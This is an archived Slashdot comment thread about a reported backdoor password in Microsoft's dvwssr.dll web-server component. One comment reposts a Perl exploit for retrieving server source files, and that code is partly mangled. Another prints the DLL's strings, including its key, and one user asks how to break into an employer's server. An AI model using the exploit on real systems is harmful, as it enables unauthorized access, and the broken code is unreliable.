    And if you're working as a programmer at a major company, you're making enough money that you ought to be able to just quit and support your family for a few weeks while you look for a new job (and cool off your anger).

    As for the one hour--well, if all you care about is money, sure, but if I just had to quit a job over something like that, I'd be looking a little more carefully at my next employer....

    --
    no .sig, no slogan
  154. Re:Oh dear.... by payn · · Score: 1

    No, no, Win2005 won't be out until 2010. It'll be Win2002 that's released in 2005.

    --
    no .sig, no slogan
  155. Re:As for the password...... by payn · · Score: 1

    MacOS isn't a Microsoft OS, and IE 4.5 or 5.0 clobbers Netscape 4.x in every way--speed, stability, size, standards implementation, flexibility, and features. Plus, Steve Jobs told me to use it. (Actually, I use iCab 1.9 more often than either, as it's the only one that hasn't yet crashed my computer.)

    The one area where Netscape beats IE is in platform support. IE runs on only Windows, MacOS, and a few Unixes, and it's wildly different on each platform. Netscape 4.7 runs pretty much the same under LinuxPPC as under MacOS, which is pretty nifty.

    So what about Netscape 6.0? Well, it closes the gap in some areas, and goes even farther with its multiple platform support--plus, it's based on open source code. But for MacOS or Windows, IE is still better as an everyday browser. Sorry.

    --
    no .sig, no slogan
  156. Oh dear.... by gkAndy · · Score: 1

    Is it me or is Microsoft getting worse at realising security flaws in their own software? :)


    --
    Andy
    1. Re:Oh dear.... by Ron+Harwood · · Score: 1

      I agree 100% - what is next? Where else will we find these engineered holes? It's a strong argument for external peer review if you ask me - oh wait that's the open source model!

    2. Re:Oh dear.... by coolgeek · · Score: 1

      That's a typo, right? You meant when win2005 comes out, didn't you?

      --

      cat /dev/null >sig
    3. Re:Oh dear.... by nodeboy · · Score: 2

      well they knew about it for ages, but only tell us now, why? To give a reason to UPGRADE!! everyone upgrade, upgrade, upgrade!!!

      the bug is missing from win2000, but wait, when win2002 comes out then suddenly a hole will appear and then everyone will have to UPGRADE AGAIN!!!

      Just don't forget to upgrade chaps!

      PS. I hope this "feature" will leave them open to a class action ;-)

    4. Re:Oh dear.... by setantae · · Score: 2
      Is it me or is Microsoft getting worse at realising security flaws in their own software? :)


      Realising? Discovering?

      There are a large number of people here who think that this is just a bug that's been discovered!
      It's a security hole that has been deliberately engineered and designed into the server.
      This is absolutely outrageous and makes me worry what else they are likely to do:

      "Whoops! We accidentally intercepted your credit card number and bought ourselves a helicopter, but we guess you'll put up with it because you forgive us everything."

  157. Re:That's what #ifdef _DEBUG is for by JonK · · Score: 1
    True up to a point, but if you have a half-way decent optimising compiler, removing #ifdef'ed code from a project can introduce all manner of new and exciting bugs: over-aggressive use of registers, interesting aliasing problems and so on can all crawl out of the woodwork. Unless you're prepared to put up with -O0 (that's capital o, zero for those reading in monochrome...) there's always going to be changes in the code emitted between the debug builds and the release builds if the code-base changes.

    But yes, everyone should read WSC at least once: it's (IMHO) part of the canon.
    --
    Cheers

    Jon
  158. backdoor or an easter egg? by markjrubin · · Score: 1

    Is this a backdoor or an easter egg? If it's a backdoor, how would someone take advantage of it? I work for a web developer that has one nt 4 box mixed againg the rest of the Unix boxes. If I can hack into the machine, they'll probably scrap it. Does anyone know how I can hack in?

    --
    Howdy.
  159. Re:If it were open source ... by MWright · · Score: 1

    Wait... the flight simulator WAS deliberate?!?!? I had thought it was a bug! Can't accidentally forgetting brackets in certain places turn a spreadsheet program into a flight simulator!? ;)


    -----

    --
    "But really, I think life is just a game of Mao Nomic." -Purplebob
  160. Re:What took so long? by Reinhold+Messner · · Score: 1

    Couldn't it be possible that they just stripped out some inefficient code without looking at it when they decided to rewrite some subroutines?

  161. Sendmail Re:Backdoors in "secure software" by mr · · Score: 1

    >Backdoors aren't always a bad thing. Say due to some "bug" in the software, you get locked out of your mission critical system. How do you get back in?

    Sendmail. Internet Worm.

    Does ANYONE remember this? How the backdoor used was there to help debug sendmail. And how this known backdoor was used to propagate the worm.

    --
    If it was said on slashdot, it MUST be true!
  162. I just don't get it! by DoctorPepper · · Score: 1

    I just don't get it.

    With all of M$'s crappy software, the bugs, the stability problems, the BACKDOORS, I just can't for the life of me understand why people keep SPENDING GOOD MONEY for M$'s software!
    It really is a damn shame that so much money is WASTED each year on CRAP LIKE THIS!

    The part that really cracks me up is when someone makes a post like this and three-dozen pro-M$'ers respond back to it, praising M$!

    I think the Government should form a task force to discover what M$ uses to brain-wash these poor unfortunates.

    --

    No matter where you go... there you are.
  163. Re:What took so long? by nowindowz · · Score: 1

    I don't know where I put the book, but in school one time I had to read a book about someone I really dislike, so I read the biography of Bill Gates, and in there back when they were still based in NM, and shipping basic for the Trash 80, he said something to the effect of, Screw beta testing, let the customer find the bug and then we will fix it. That is not the exact quote but then again I can find the book. Moving sucks, you lose everything.

    --
    Where are we going and why are we in a handbasket?
  164. Is www.micrsoft.com down? by quakeaddict · · Score: 1

    I just tried to get on Microsoft's site to read the latest from them about this issue and I was confronted with an "internal server" error message.

    Did someone get in the backdoor and wreak havoc?

    --
    I'm still working on a clever footer.
  165. Re:Not MS policy by spiralx · · Score: 1

    Yeah, but considering the amount of bloat present in all of MS's products, code review is probably an uphill struggle. There are always going to be small things which can get through, and I doubt this hole takes much code to implement.

  166. Re:IE 5.0 _does_ have a real easter egg! by Steeltoe · · Score: 1

    It worked for me using a Swedish (don't ask) version of IE 5.0. Kinda makes you wonder how professional IE-developers really are huh? ;-) Or maybe they're... *creeps* human?

    - Steeltoe Lizardman

  167. Big-time security issue! by Steeltoe · · Score: 1

    Why don't they tell us what the login/password is? Do they still live in the Dark Middle-Ages?? Security through obscurity never worked and it never will!?!!

    - Steeltoe "Slashbot powered by Slashdot"

  168. Re:"affects almost every web-hosting provider" by darrenford · · Score: 1

    But they didn't say almost every web site, they said web-hosting provider.
    Don't most hosting companies offer *nix or NT options? If they only have 1 IIS site, they are "affected".

  169. Re:Down right criminal... by beagle · · Score: 1
    You don't think the manufacturer of your security system has codes to bypass your code?

    It's not the same. A security system isn't software and the tools to detect and use such a hole aren't (readily) available. OK, maybe in Wargames but not for most people in the real world.

  170. Re:5.01 128 bit english - doesn't work by athmanb · · Score: 1

    Perhaps your ISP changed the search function, so it doesn't link to the original IE search page.

  171. Re:OffTopic: Your sig - W3C Validation by superyooser · · Score: 1

    I'm using the list within a table cell. Wouldn't Opera automatically close the list at the </td> tag?

  172. OffTopic: Your sig - W3C Validation by superyooser · · Score: 1
    Concerning your sig...

    I believe most of the parsing errors are due to Slashdot's omission of a DOCTYPE declaration. Most of the errors seemed to be unwarranted. As for the true "errors"... Oftentimes, it is necessary to use non-compliant code in order to achieve a uniform look in both Netscape and IE. Also, HTML's limitations make it difficult to strictly adhere to the standards.

    For instance, if you want to make unordered list items appear directly below some other text, you must omit the <UL> tags. There might be a better (i.e., standards-compliant) hack, but this is the way /. and I do it.

  173. Re:Linux has frontpage extensions? by Tom7 · · Score: 1

    If one is dumb enough, he can install FrontPage extensions for apache. There exist local exploits in it (still, I think) though.

  174. Re:Linux has frontpage extensions? by Tom7 · · Score: 1

    If you are actually interested:

    - I am not a so-called "security-expert", unless you want to call me that.

    - I didn't remove services from customers, I refused to install frontpage extensions to apache, which provides trivial functionality (easily replaced with ftp) at a large cost of security (risk). See

    http://www.dataguard.no/bugtraq/1998_2/0181.html
    http://www.dataguard.no/bugtraq/1998_2/0158.html

    ...Or any of the other thousands of hits on an altavista search like "+frontpage +apache +exploit".

    - It is impossible (or at best extremely difficult) for me to audit and secure these extensions myself because as far as I can tell, they are only distributed in binary form. Even if I did have the source, I wouldn't want to commit the time to it.

    - I don't like very much of their software, but I never called MS engineers stupid. I like some of the research that comes out of MS, actually.

    - Backdoor or not, security problems in MS Software are common (think SQL's 'sa', ActiveDirectory, BackOrifice, etc).

    - My summer job may in fact be "janitor" to you (though most of the time I was doing development, I did some unix administration, too). But your implication that I'm stupid is not very nice or accurate, as I'm currently a CS student at a top-5 University. My "real job" is programming language research.

    Your inflammatory tone betrays your own insecurity. Grow up!

  175. Re:Linux has frontpage extensions? by Tom7 · · Score: 1

    Was this directed at me?

    I definitely wasn't fired for refusing to install FP extensions on our apache web host, actually, my understanding of security is one of the reasons I got my job and one of the reasons I retain it.

    I clearly recall seeing multiple exploits involving frontpage extensions on unix, and wouldn't doubt if these were planned (or not carefully-enough engineered around) by Microsoft.

    On second thought, I think you are just a troll. Good evening!

  176. Re:Backdoors in "secure software" by Slashdot+Fool · · Score: 1
    And of course, once you disable the backdoor, the tech can't get in either - so what was the argument for them? They *will* get found and exploited (especially if you leave the password in an unencoded string, duh!) and then your mission-critical control system has worse problems than maybe losing six hours work.

    Backdoors are *evil*, sick and wrong. No two ways about it.

    Steff

  177. Re:Don't be too complacent. by RickHunter · · Score: 1

    First, with Free Software (or Open Source, depending on your views), there is the potential for review of the code. Whereas with closed source, you can only review the code if the company in question lets you. And most don't. With free software, chances are that if there's anything nasty in there, someone will find it. As for a security vulnerability in a binary package... If you're concerned about security, compiling from code is the way to go.


    -RickHunter
  178. Re:Backdoors in "secure software" by Kmon · · Score: 1

    Say due to some "bug" in the software, you get locked out of your mission critical system. How do you get back in?

    If the software is so poorly written that it locks even the root user out, how can we believe that the backdoor is sufficiently hidden? The more reasonable solution is to write good code in the first place.

    --
    Gah
  179. Re:What took so long? by Anony+Mouse · · Score: 1
    An AC wrote:
    Aha. A FreeBSD bigot working at Microsoft. Things are starting to get clearer now. When can we expect MS-BSD ? Or is BSDI already turning FreeBSD into shareware ?

    Dude, don't be an idiot. One Microsoft employee using FreeBSD does not constitute a conspiracy. Talk like that just makes Linux users in general look bad. You need to cool off.

    --
    # echo 'SboPshAeaM@rSicPocAheMt.SnePt' | sed -e 's/[SPAM]//g'
  180. Re:Spelling.... by Some+Strange+Guy · · Score: 1
    Human poster URL munging strikes again!

    Oh well, you can fix it by hand...

    (Sorry, couldn't resist...:)

  181. OK -maybe I'm just THAT paranoid by waldeaux · · Score: 1
    Could it be that it's an intentional bug to put in the x98 class of products, that just happens to be "discovered" after the 2000 suite has been released?

    It'll be interesting if M$'s "solution" to the problem is "buy the 2000 series software --- it doesn't have that bug!", neglecting to mention that some similar "feature" has been included to push people along the next time they haven't lined up at the trough to purchase whatever the newest M$ offering is.

  182. Re:Affects "almost every Web-hosting provider." by [Bruce] · · Score: 1

    not "bug" - screw up. It's this sort of thing, as well as bugs, that gives Microsoft its reputation.

    --

    ---
    Just because life sucks, it doesn't mean you have to care.
  183. Re:As for the password...... by [Bruce] · · Score: 1

    If that were the case I would expect it to be removed altogether. It's not the sort of thing where people would say "O, we can't put that in, it's got bad language". However M$'s stupidity never ceases to amaze me.

    --

    ---
    Just because life sucks, it doesn't mean you have to care.
  184. Re:What took so long? by B'Trey · · Score: 1

    Depends upon your definition of "large group." The group of people working in their spare time is much larger than the overpaid group.

    --

    "The legitimate powers of government extend only to such acts as are injurious to others." Thomas Jefferson.

  185. Re:What took so long? by B'Trey · · Score: 1

    So doesn't this put you in the exact same position as the MS developers? That is, you're both taking a piece of crappy code written with little or no coherent design and trying to fix it after the fact?

    --

    "The legitimate powers of government extend only to such acts as are injurious to others." Thomas Jefferson.

  186. Re:Backdoors in "secure software" by DeepDarkSky · · Score: 1

    I've seen a video web server box that allows a backdoor but that which is controllable by the admin of the unit. It's rather clever, I thought. The admin can change the admin password, etc., it came with some simple default password. There's also a backdoor user called backdoor. You can't change the password on this one, it's known only to the company who made the box (supposedly). But you CAN change the backdoor user name. This is something that can be documented even. There's still security risks, but it's better than the simple backdoors, because there's a level of control over it, and they tell you there's a backdoor (if there's more, they didn't say).

  187. Re:Taking a bomb on a plane by gaudior · · Score: 1

    Actually, this is a technique in software engineering. You seed a project with a known number of errors, and compare the number of known errors discovered in testing with the ones you put in in the first place. This gives you an idea of how thoroughly you have tested, and where you have gaps in your methodology.

  188. Re:Taking a bomb on a plane by nlvp · · Score: 1
    If I dig a really big hole in my garden, maybe the neighbours won't notice that there are lots of little holes all around it?

    Cool philosophy - next time I do an analysis, I'll be sure to include a couple of deliberate errors, just to make sure there are no accidental ones.

    The really scary thing is, you're probably right, even though you meant it as a joke. You did mean it as a joke didn't you?

  189. Breaking news... Holes in Microsoft software. by nlvp · · Score: 1

    Well duh, welcome to the party, took you long enough.

  190. Re:Backdoors in "secure software" by Andrew+Cady · · Score: 1
    That's why all car doors (and ignitions) should accept the same universal key. If you lock your keys in your car, you can get right back in by calling the manufacturer.

    Tell me, if telnetd (or however you get into Windows boxen normally) is down, why would backdoor.dll be up?? And why not let user set his own password for backdoor.dll? You didn't really think this out, did you? Neither did the moderators, I guess...

  191. Sounds Like... by kc0dxh · · Score: 1

    This sounds just like all those cheesy virus rumors that circle back every 9 months or so. Don't open the email that says "It takes guts to say Jesus". Rogue med students are stealing kidneys. And, oh yea, Microsoft left a backdoor password into its web server.

    Next I suppose I'll hear about a single .dll that causes all MS instability and MS fired the man who knew about it back in the 3.1 days. BTW, you can download the fixed file at ZDnet and TUCOWS, but Microsoft won't publish it.

    --

    --- "1.21 Jigawatts!" -Doc

  192. Oh happy days by wizman · · Score: 1

    It's times like this that I'm glad as a web hosting provider that I run a wonderful open sourced operating system and web server. If this isn't enough to want to make a company switch to Linux, BSD, whatever - I don't know what is. This topic gave me a wonderful idea for a document that should be written. I have a feeling too many NT people stick with it because they're comfortable with it, it does the job although not perfectly, and they're afraid of how hard it might be to switch. I don't know if it exists, but if not there should be a howto, FAQ, or book written with the NT person in mind on migrating to Linux or BSD.

  193. Just another Easter Egg? by Saltine+Cracker · · Score: 1

    Hey wait a minute everyone...maybe this is just another M$ Easter Egg. When you hack this DLL does it show you some nifty little .avi with the Developer Credits?

  194. Code to exploit dvwssr.dll by Saltine+Cracker · · Score: 1

    Snipped from a bugtraq email...I thought it was a pretty nifty -

    #!/usr/bin/perl
    # dvwssr.pl by rain forest puppy (only tested on Linux, as usual)
    #
    # Usage: dvwssr.pl target_host /file/to/retrieve/source
    #
    use Socket;
    $ip=$ARGV[0];
    $file=$ARGV[1];
    print "Encoding to: ".encodefilename($file)."\n";
    $url="GET /_vti_bin/_vti_aut/dvwssr.dll?".encodefilename($file)." HTTP/1.0\n\n";
    print sendraw($url);
    sub encodefilename {
    my $from=shift;
    my $slide="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    #
    #
    my $key="Netscape engineers are weenies!";
    #
    #
    my $kc=length($from);
    my ($fv,$kv,$tmp,$to,$lett);
    @letts=split(//,$from);
    foreach $lett (@letts){
    $fv=index $slide, $lett;
    $fv=index $slide, (substr $slide,62-$fv,1) if($fv>=0);
    $kv=index $slide, substr $key, $kc, 1;
    if($kv>=0 && $fv>=0){
    $tmp= $kv - $fv;
    if($tmp if(++$kc >= length($key)){ $kc=0;}
    }return $to;}
    sub sendraw {
    my ($pstr)=@_;
    my $target;
    $target= inet_aton($ip) || die("inet_aton problems");
    socket(S,2,1,getprotobyname('tcp')||0) || die("Socket problems\n");
    if(connect(S,pack "SnA4x8",2,80,$target)){ select(S);
    $|=1;
    print $pstr;
    my @in=;
    select(STDOUT);
    close(S);
    return @in;
    } else { die("Can't connect...\n"); }}

  195. Re:If it were open source ... by MonkeyMagic · · Score: 1

    This isn't a flaw - it's deliberate. It's no more a flaw than the flight simulator in Excel 97

    I did consider the word "flaw" carefully before using it. I don't consider it to be a "bug" or a "mistake". A flaw, however, can be there by design. Something like deliberately being a troll on Slashdot can be considered funny (deliberate) by some, but a character flaw by others.

  196. it makes a 3rd party market by DrSkwid · · Score: 1

    for cheat code magazines etc.

    games developers put them in to give their games longevity and playground talkability

    have u got the cheats for x game it's cool

    gives kids some hope and they don't become too despondent

    ask Carmack about god mode
    .oO0Oo.

    --
    There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
    1. Re:it makes a 3rd party market by Fishstick · · Score: 1

      I can see that.

      OT - worst gaming experience of my life was when I was halfway through Doom2 and got stuck, someone gave me noclip and godmode cheats so I could get through it. Ended up playing through the rest of the game with cheats every time I got stuck. Finished the game but did not have the same feeling of enjoyment that I had in finishing Wolf3d and Doom. Ever since, I have avoided cheatcodes like the plague.

      --

      There is much cruelty in the universe, John.
      Yeah, we seem to have the tour map.

  197. Simple - LAME by DrSkwid · · Score: 1

    a sysadmin that argues FOR an undocumented and exploitable back door into his and *everybody* else's server that offers a total point of entry into everybody's files is clearly not the sysadmin you should be employing.

    Who the hell would rely on a server that is 30 miles from their only sysadmin who not only CAN'T DRIVE but says that 10 minutes of downtime is too much trouble.


    .oO0Oo.

    --
    There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
  198. Re:Backdoors in "secure software" by DrSkwid · · Score: 1

    >... including the girls changing rooms, shame I didn't have a webcam

    ah, now I know why they didn't trust you

    >Then I got suspended for hacking. The bastards
    you of course went to your principal and said

    "I can get in to the servers but only by hacking. Would you like me to proceed?"

    no, you thought you knew better than the admins and took charge.

    I hope they hit you with a clue stick


    .oO0Oo.

    --
    There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
  199. play it on hard by DrSkwid · · Score: 1

    I have avoided cheatcodes like the plague.

    they can make life fun sometimes

    playing half life deathmatch with no dying is great fun with enough people - blood everywhere!!


    .oO0Oo.

    --
    There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
  200. Affect Court? by BillYak · · Score: 1
    I'm wondering how this will affect any of the court happenings. Do you think this will increase the penalty of the anti-trust case, or cause netscape to take some additional actions?

    This can't be good for MS, but hey, maybe that's a good thing :)

  201. Linux has frontpage extensions? by EvilGwyn · · Score: 1

    really?

    --
    Phear my l33t homepage.
    1. Re:Linux has frontpage extensions? by garver · · Score: 2

      Or if one has customers that demand frontpage, these aren't hard to find, and doesn't want to run MS IIS to support them.

      If you install Frontpage extensions with apache, be very careful with security. Do not allow shell access to the machine and Do not trust MS's mod_frontpage for Apache. There is an alternate mod_frontpage (not the darkorb one) that is based on suexec. I don't have the link here at work, but I can post it from home, if you are interested.

      Sure, frontpage is still an insecure piece of crap, but I have it so that it never sees the light of root, in fact each site has its own userid. Therefore, the only thing that can get screwed is my user's pages, one at a time. I'm not responsible for that, and they know the risks.

  202. Re:Not MS policy by EvilGwyn · · Score: 1

    Well, hasn't Alan Cox been releasing on a regular basis a list of all the "issues" preventing them from releasing 2.4? I seem to recall there were about 40 or so things on that list. A few less than 65000 but hey who's counting :)

    --
    Phear my l33t homepage.
  203. One question by ickle_matt · · Score: 1

    If Microsoft are saying that dvwssr.dll can be deleted, what does it actually do?

    1. Re:One question by ickle_matt · · Score: 1

      Replying to myself - I managed to find out...

      dvwssr.dll FileDescription: Microsoft Design Tool - Link View

      What the fsck is that doing anywhere near the web server, let alone doing user validation or however this backdoor works????? Interestingly enough, Microsoft have nothing about it on their web site, not even in the Technet or MSDN security sections...

  204. I'm just waiting to see by el_guapo · · Score: 1

    their marketing spin on **this** little darlin'. They have somehow convinced the ignorant-at-large that they are security conscious enough to warrant using (you don't have to like it, but you can't argue that there aren't a lot of them out there..). Well, this one seems a bit too big of a turd for them to just wax over - anxiously awaiting further news....

    --
    mas cerveza, por favor politically incorrect stu
  205. Re:Back doors are back in vogue by paranoidfish · · Score: 1

    From the article above:

    "Imagine if it had been Microsoft," Harris said.

    :-)

  206. Here's "strings" output from dvwssr.dll by Chagrin · · Score: 1
    Here's strings output...
    [root@pinkeye /root]# strings dvwssr.dll

      !This program cannot be run in DOS mode.
      .text
      `.rdata
      @.data
      .idata
      .rsrc
      @.reloc
      >%u:
      D$4h
      D$4j
      ]_^[
      t*;5
      D$4j
      D$ DVWSSR.DLL
      DllMain
      GetExtensionVersion
      HttpExtensionProc
      /global.asa
      .asp
      !seineew era sreenigne epacsteN
      HTTP/1.0 404 Object Not Found
      XWebScope Source Retriever
      _refresh_acls_
      Content-type: text/html
      KERNEL32.dll
      lstrcmpiA
      lstrcpynA
      CloseHandle
      ReadFile
      CreateFileA
      lstrlenA
      lstrcpyA
      GetModuleFileNameA
      lstrcmpA
      1!1-141H1O1
      2q2}2
      `0d0
      dvwssr.dbg
      ssr.dll
    --

    I/O Error G-17: Aborting Installation
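
The reversed literal in the strings listing above is easy to miss with a plain keyword search. As an added example (not part of the original post), this Python block extracts printable runs the way strings does and flags runs that read as English only when reversed; the byte blob is constructed from lines in the listing, and the short word list and the function names are assumptions standing in for a real dictionary and tool.

```python
import re

# Constructed bytes: a few literals from the strings listing above, separated
# by NUL bytes the way literals sit in a data section. This is not the DLL.
SAMPLE_BLOB = (
    b"\x00\x00/global.asa\x00.asp\x00\x00"
    b"!seineew era sreenigne epacsteN\x00"
    b"HTTP/1.0 404 Object Not Found\x00\x01"
    b"XWebScope Source Retriever\x00"
)

# Assumption: a tiny stand-in for a dictionary file. A real audit would load
# a full word list (for example the system dictionary) instead.
COMMON_WORDS = frozenset({
    "and", "are", "be", "cannot", "engineers", "found", "in", "is", "key",
    "mode", "not", "object", "password", "program", "run", "secret", "the",
    "this",
})


def extract_strings(data, min_len=4):
    """Return (offset, text) for each run of printable ASCII, like strings(1)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(m.start(), m.group().decode("ascii")) for m in pattern.finditer(data)]


def word_score(text):
    """Count how many alphabetic tokens in text are known words."""
    return sum(1 for w in re.findall(r"[a-z]+", text.lower()) if w in COMMON_WORDS)


def find_reversed_literals(data, min_len=4, min_words=2):
    """Flag literals that contain more known words backwards than forwards."""
    findings = []
    for offset, text in extract_strings(data, min_len):
        flipped = text[::-1]
        forward, backward = word_score(text), word_score(flipped)
        if backward >= min_words and backward > forward:
            findings.append(
                {"offset": offset, "as_stored": text, "reversed": flipped}
            )
    return findings


if __name__ == "__main__":
    for finding in find_reversed_literals(SAMPLE_BLOB):
        print(f"0x{finding['offset']:X}: {finding['as_stored']!r} "
              f"reads as {finding['reversed']!r}")
```
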

  207. Back doors are back in vogue by sassy · · Score: 1

    Seems that back doors are the rage again. There was an article on internetnews.com about back doors in some shopping cart software that could allow a hacker complete control of the server it's installed on.

    Anyone wanna go shopping?


    --



    if you don't like the system, change it.
  208. More on MS exploits by KiboMaster · · Score: 1
    I found this site a while ago... It details exploits for most operating systems, with fixes, workarounds and/or patches. I usually see things posted here before I see them posted elsewhere. Bugtraq might be a bit better, but I've used this site for a long time and it's saved me quite a bit of trouble.

    Security Bugware

    --

    "Happiness in intelligent people is the rarest thing I know."
    -- Ernest Hemingway

  209. Re:Is it just me or... by KiboMaster · · Score: 1
    As much as I agree with you, I believe people should have the right to freedom of speech. It would be really hypocritical (no I can't spell) of slashdot to say to someone "Your post is contributing to pointless babble-- we're going to ban you."

    If you don't like what's being said, don't listen to it.

    --

    "Happiness in intelligent people is the rarest thing I know."
    -- Ernest Hemingway

  210. Re:FP's author.dll is also 'weird' by Dahan · · Score: 1
    Looks more like a SourceSafe ID string to me (so you can tell which version of the source code this DLL was compiled from). Have you tried running either the ident or what commands on just about any Unix system?

    linux ~> uname -a
    Linux linux 2.0.36 #3 Fri Dec 17 00:10:51 CST 1999 i686 unknown
    linux ~> ident /bin/su
    /bin/su:
    $Id: su.c,v 1.9 1998/01/29 23:22:44 marekm Exp $
    $Id: getdef.c,v 1.10 1998/04/02 21:51:42 marekm Exp $
    $Id: port.c,v 1.3 1997/12/07 23:26:54 marekm Exp $
    $Id: pwauth.c,v 1.6 1998/01/29 23:22:30 marekm Exp $
    etc...

    Does this mean /bin/su on that Linux machine (I think it's Redhat, but I don't actually know) has a backdoor? No.

  211. What took so long? by xtremex · · Score: 1

    How come Microsoft always takes decades to figure these security flaws? Is it intentional?

    --
    If you're not a Liberal in your 20's, then you have no heart.If you're still a Liberal in your 30's you have no brain.
    1. Re:What took so long? by st_george · · Score: 1

      Cool - spelling and grammar like that in a quality debate...

      Anyway, I can't subscribe to the 'Linux has ... instant (and _real_ - not stolen) innovation' arguments for several reasons, for example since my last few Linux installs made fvwm95 the default X wm - all the derision aimed at the MS interface and the MS way of doing things and what does the Linux community do? Copy the innovation that MS paid millions to research. I know there have been some good steps forward in that direction recently, but please stop trying to imply we have nothing good to learn from Microsoft.

      I use Linux, but not on my main machine. There's just too much I still can't do with it. The MS products are far from perfect, but seven years in I still can't get Linux doing the things that NT helps me do in my job.

      Linux has been fun, but a lot of the Linux people I know are sick of the creeping commercialism and the constant whining and sniping that infest the Linux world today. They (and I) enjoyed the early years of tinkering, learning and developing, but it's not fun any more - people are taking it way too seriously. What a shame.

    2. Re:What took so long? by JonesBoy · · Score: 1

      QA checks? Does 64,000 bugs ring a bell? QA is nonexistent. As long as it gets out the door two years late they don't seem to give a damn at Microsoft. Look at the first version of FP. More bugs than a volkswagen factory. Ex. Every time you open a page in the editor it removes the background for you.

      --
      Speeding never killed anyone. Stopping did.
    3. Re:What took so long? by Masked+Marauder · · Score: 1

      MS does quality assurance checks? Wow, that is news! But MS is an innovative company and industry leader.

    4. Re:What took so long? by Hentai · · Score: 1

      Actually, it's backwards. It says "!seineew era sreenigne epacsteN" right at address 0xE15. Check it yourselves, kids - I have no clue if this is a password or not, but it's definitely in there, right in the middle of the DLL's string table.

      --
      -Hentai [in vita non pacem est]
    5. Re:What took so long? by cheezehead · · Score: 1

      What I find odd is that the article says the perpetrator is as yet unknown. Does MS allow anonymous submissions to its core products? That is truly astonishing.
      It may be that their configuration management/version control procedures leave a lot to be desired. Maybe MS does not allow anonymous submissions, maybe they just can't do anything about it. Would it surprise you?

      --

      MSN 8: Now Microsoft even has bugs in their ad campaigns.

    6. Re:What took so long? by cypher777 · · Score: 1

      First off: Leenoox denigration will not be tolerated. You must die now. Linux bugs are few and far between when compared to the mosaic flaws found in any given m$ "product." Summary: DIE. Second (oh, wait, it's not flowing this way anymore): Linux bugs are reparable.. You will never hear a Linux Guru say something so asinine as "delete this shared lib" - EVER. That's not a solution. Anyway, your kind is slowly but surely dying. Now is the time for free exchange of information, free code, instant (and _real_ - not stolen) innovation. Now is the time for anyone who is in it for the money and has no concept of reality to fall painfully off the bandwagon. Gone is the time when corporate bastards can trample willy-nilly on the real drivers of the industry. Gone is the time when marketing counts more than product. Gone is the time when putrid, snide, uninformed comments such as yours will be accepted. Your kind is about to suffer a Great Fall. There is no parachute; you have no recourse - you are part of a dying breed of Cro-Magnon anti-intellectuals. You will perish. Notice, there is no "quality assurance department" for Linux. It works the first time, and if there is a fault, no expense, no amount of time or hair-pulling is spared until the problem is resolved. No Linux enthusiast or product will ever be involved in such inane displays of anti-productive power initiatives. I say again. You are dead or dying, and we all hail the moment when the last remnant of your kind is vanquished and the free can live on in peace, happiness and prosperity. One more time, just because I don't think I've driven the point hard enough: Die. Diediediedie. ok, a few more.... Thank you very much for your time, and your demise. The world thanks you .. whilst pissing on your piddly shallow grave.

    7. Re:What took so long? by phil+reed · · Score: 2

      Hell yes, it's intentional. How does a text string that says "Netscape engineers are weenies!" wind up in a system DLL and make it through quality assurance checks without being intentional?


      ...phil

      --

      ...phil
      "For a list of the ways which technology has failed to improve our quality of life, press 3."
    8. Re:What took so long? by bill_mcgonigle · · Score: 2

      So if this isn't present in Windows 2000/IIS2000, or whatever it's called this week, then they went over the old code, found it, deleted it, and told nobody.
      Unless they're claiming they wrote IIS from scratch now too.

      --
      My God, it's Full of Source!
      OUTSIDE_IP=$(dig +short my.ip @outsideip.net)
    9. Re:What took so long? by alfredo · · Score: 2

      After seeing my stock portfolio crash and burn I feel trollish too.

      There is a difference. MS portrays itself as professional, and Linux is seen as a grand experiment. No one expects Linux not to have some rough edges. Being a work in progress is what Linux is all about. But when you pay several hundred dollars for software, it better work. If a Disc from some guy making Linux copies is flaky, no big thing, but if some MS bug factory software turns your computer into a paper weight, it is a big thing.

      It is expectations.

      --
      photosMy Photostream
    10. Re:What took so long? by TheCarp · · Score: 2

      Bizarre....I almost never have apps under linux
      crash on me...been using it exclusively for the
      past 3 years too.

      The exceptions are netscape (which is a pile of
      shit...but the best pile of shit I can find). Tho
      netscape crashed 3 times as much as it does now
      when I left Java and Javascript turned on, and 6
      times more when i ran windows and left them on.

      Course...I have had Kernel crashes. In fact the
      linux kernel crashes for me more often than most
      applications (which never crash). Of course,
      that's on the order of once or twice every 6
      months of continuous use. (I was getting a lot of
      crashes about 3 months ago...went away...may have
      been a buggy program that was accessing hardware
      directly...Ie X)

      Interestingly...it's never crashed on my other
      machines...probably a hardware problem I would
      guess...

      Still better than Windows where I was lucky to
      get 2 days of uptime...a couple of hours was much
      more common. Course...I haven't used it in 3 years
      now. Don't miss it.

      -Steve

      (btw kernel crash means no response, not even to
      alt-sysreq - which I leave turned on - and can't
      even ping from another terminal.)

      --
      "I opened my eyes, and everything went dark again"
    11. Re:What took so long? by TheCarp · · Score: 2

      I have to agree and disagree. Certainly there IS
      an expectations difference. However, Linux is in
      general MUCH more stable than windows. I know from
      first hand experience, both as a windows user, a
      few years back, a PC technician, a year ago, and
      a Linux sysadmin (current).

      As a desktop, my linux boxes have average uptimes
      of 50 days or more. It's much more common for me to
      have a hardware failure than a kernel crash
      (except on this box...even so, I have 48 days
      uptime on it...)

      We use Linux for some of the servers at work. I
      have never seen them go down (in fact, while they
      have never crashed, in the time I have been there
      our big Compaq Alpha running DEC Unix has gotten
      itself wedged in ways that the only way it could
      be fixed was to crash it and reboot at least
      twice and our other big Alpha has done only
      marginally better.
      (admittedly there is a major load difference, the
      linux servers do not usually have 400 simultaneous
      logins)

      SO yes, there is an expectations difference.
      The Microsoft products look "professional" and
      generally fail to make the grade (don't anyone
      try to tell me windows is actually very stable,
      I have used it and fixed it for others myself, it
      does not stand up to normal real user use)

      On the other hand...while linux is "rough around
      the edges" and has a steeper learning curve, it
      is much more stable on the whole. It tends to
      exceed expectations.

      As a friend said when he realized it was time to
      stop running windows..."You have to expect that
      a computer is going to crash...oh wait..no that's
      wrong, you shouldn't have to expect it will crash.
      What bullshit, there's no reason for it to crash so
      much"

      --
      "I opened my eyes, and everything went dark again"
    12. Re:What took so long? by Masked+Marauder · · Score: 3

